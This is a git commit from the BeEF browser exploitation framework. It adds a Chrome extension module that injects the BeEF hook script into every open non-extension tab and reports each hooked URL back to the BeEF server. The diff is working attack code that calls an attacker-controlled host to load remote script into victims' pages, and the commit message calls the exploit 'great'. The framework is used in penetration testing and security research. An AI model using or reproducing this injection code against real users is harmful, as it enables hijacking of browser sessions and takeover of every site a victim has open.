(Fixes issue 507): added Chrome extension exploit that injects the BeEF hook on all the available tabs. Works great!

git-svn-id: https://beef.googlecode.com/svn/trunk@1309 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-09-25 13:08:29 +00:00
parent 447b006096
commit 8037d46d94
3 changed files with 45 additions and 0 deletions
--- a/modules/chrome_extensions/inject_beef/command.js
+++ b/modules/chrome_extensions/inject_beef/command.js
@@ -0,0 +1,26 @@
+beef.execute(function() {
+
+        var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
+
+        chrome.windows.getAll({"populate" : true}, function(windows) {
+			for(i in windows) {
+				if(windows[i].type=="normal") {
+					chrome.tabs.getAllInWindow(windows[i].id,function(tabs){
+						for(t in tabs) {
+                            //antisnatchor: if the extension has her own tabs open, we want to precent injecting the hook
+                            //also there. Chrome extensions with tabs and http/s permissions cannot access URIs with protocol
+                            // handlers chrome-extension://, and most of them will not have permissions to do so.
+                            if(tabs[t].url.substring(0,16) != "chrome-extension"){
+                                chrome.tabs.executeScript(tabs[t].id,{code:"newScript=document.createElement('script'); newScript.src='"
+                                    + beefHookUri + "'; newScript.setAttribute('onload','beef_init()'); document.getElementsByTagName('head')[0].appendChild(newScript);"})
+
+						        //send back the new domain that will be hooked :-)
+                                beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Succesfully injected BeEF hook on: ' + tabs[t].url);
+                            }
+						}
+					})
+				}
+			}
+		});
+});
+